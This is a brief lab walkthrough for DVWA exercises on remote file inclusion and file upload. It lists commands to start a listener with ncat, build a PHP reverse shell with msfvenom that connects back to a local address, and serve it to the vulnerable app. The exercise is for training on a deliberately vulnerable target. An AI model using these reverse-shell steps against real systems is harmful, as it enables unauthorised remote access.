# DVWA Exercises 4 ### 07 Remote Fileinclusion Start a local webserver listening on port 8001 `python3 -m http.server 8001` ![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FXFVT81SaA6G4BzdGnwJo%2Frfi01.png?alt=media\&token=f019df9f-8db9-4bd6-b78b-14be0ff760f2) Start a ncat listener on port 8002 `ncat -lvnp 8002`

Generate a php reverseshell with msfvenom `msfvenom -p php/reverse_php LHOST="172.17.0.1" LPORT=8002 -f raw >shell.php` ![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2Fgf8zkBNIWCAUNR76ssU2%2Frfi03.png?alt=media\&token=a0ff6970-a5be-4d4b-ac8e-02eb7b13e4ae) First let's do a check if a remote target can be placed in the URL:

That seems to work! I can also see the http get request for test.php on my local webserver:

And now let's execute the remoteshell:

### 08 File upload

Php Reverseshell successfully uploaded

Let's try to execute the reverseshell